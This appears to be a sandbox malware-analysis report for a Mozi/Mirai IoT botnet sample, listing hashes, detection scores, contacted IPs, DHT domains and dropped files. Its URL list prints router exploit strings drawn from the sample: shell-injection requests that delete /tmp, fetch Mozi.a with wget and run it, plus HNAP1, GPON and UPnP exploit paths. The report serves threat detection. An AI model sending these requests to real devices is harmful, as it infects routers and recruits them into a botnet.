We are hiring! Windows Kernel Developer (Remote), apply here!
flash

mozi.a.zip

Status: finished
Submission Time: 2021-02-06 11:34:42 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    349551
  • API (Web) ID:
    601065
  • Analysis Started:
    2021-02-06 11:34:42 +01:00
  • Analysis Finished:
    2021-02-06 11:45:16 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
40/61

malicious
20/37

malicious
19/28

malicious

IPs

IP Country Detection
44.60.150.38
United States
13.92.116.235
United States
175.159.53.19
Hong Kong
Click to see the 97 hidden entries
81.179.119.252
United Kingdom
104.174.200.127
United States
113.113.18.44
China
185.68.99.43
Netherlands
171.198.145.203
United States
41.232.91.226
Egypt
82.253.85.237
France
125.31.207.97
China
91.117.98.122
Spain
207.23.25.29
Canada
94.178.218.143
Ukraine
7.200.67.208
United States
55.44.238.153
United States
203.252.111.5
Korea Republic of
26.31.214.72
United States
222.46.68.216
China
152.118.36.40
Indonesia
89.89.90.95
France
35.210.136.245
United States
80.254.91.193
Malta
157.39.16.40
India
173.153.15.142
United States
117.83.171.37
China
184.253.253.190
United States
113.24.165.118
China
173.63.104.87
United States
172.101.9.198
United States
158.119.251.77
United Kingdom
90.178.36.52
Czech Republic
51.74.229.172
United States
17.73.154.133
United States
148.132.232.29
United States
42.55.27.34
China
161.118.201.239
Japan
82.129.200.140
Egypt
1.71.162.33
China
134.35.254.248
Yemen
215.164.157.85
United States
153.48.151.95
United States
177.115.79.211
Brazil
153.38.105.79
United States
209.232.145.19
United States
97.70.224.8
United States
152.125.208.240
United States
189.222.218.142
Mexico
171.159.91.232
United States
184.216.173.25
United States
187.158.144.73
Mexico
113.153.230.119
Japan
44.17.143.194
United States
133.214.150.254
Japan
93.178.240.65
Ukraine
26.254.247.139
United States
19.214.106.48
United States
118.241.245.41
Japan
180.254.89.180
Indonesia
41.91.67.149
Egypt
154.3.17.209
United States
56.182.70.51
United States
42.53.76.236
China
89.157.51.131
France
93.102.56.19
Portugal
26.220.204.225
United States
11.242.227.131
United States
158.180.15.87
United Kingdom
29.31.10.222
United States
44.209.53.252
United States
22.142.197.254
United States
26.109.230.217
United States
84.50.142.113
Estonia
178.72.69.126
Russian Federation
171.221.181.48
China
78.101.119.242
Qatar
51.190.88.233
United Kingdom
111.169.102.97
Japan
122.128.194.105
Korea Republic of
174.231.155.97
United States
126.172.220.14
Japan
84.230.234.235
Finland
144.57.215.199
Sweden
106.63.191.143
China
21.176.167.107
United States
68.238.109.13
United States
102.37.69.46
South Africa
94.185.237.35
United Kingdom
74.7.13.10
United States
86.245.98.172
France
21.245.113.206
United States
172.195.124.44
Australia
16.0.53.131
United States
9.14.171.53
United States
109.143.31.175
Belgium
66.221.30.106
United States
81.176.95.215
Russian Federation
69.20.178.197
United States
124.57.147.225
Korea Republic of
189.241.241.142
Mexico

Domains

Name IP Detection
dht.transmissionbt.com
212.129.33.59
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://193.248.153.76:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://47.246.22.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
Click to see the 43 hidden entries
http://144.76.43.37:80/HNAP1/
http://24.239.192.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://34.66.226.190:80/HNAP1/
http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://159.140.205.214:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.254.64.88:80/HNAP1/
http://23.217.12.208:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.236.242.26:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://74.79.213.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh;chmod
http://23.12.191.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://180.254.107.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://175.203.81.2:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://113.161.185.44:80/HNAP1/
http://72.200.237.136:49152/soap.cgi?service=WANIPConn1
http://schemas.xmlsoap.org/soap/envelope//
http://www.pastebin.ca.
http://purenetworks.com/HNAP1/
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.a;sh$
http://190.189.194.46:49152/soap.cgi?service=WANIPConn1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org.
http://HTTP/1.1
http://www.alsa-project.org
http://pastebin.ca)
http://%s:%d/Mozi.a;chmod
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://www.pastebin.ca
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#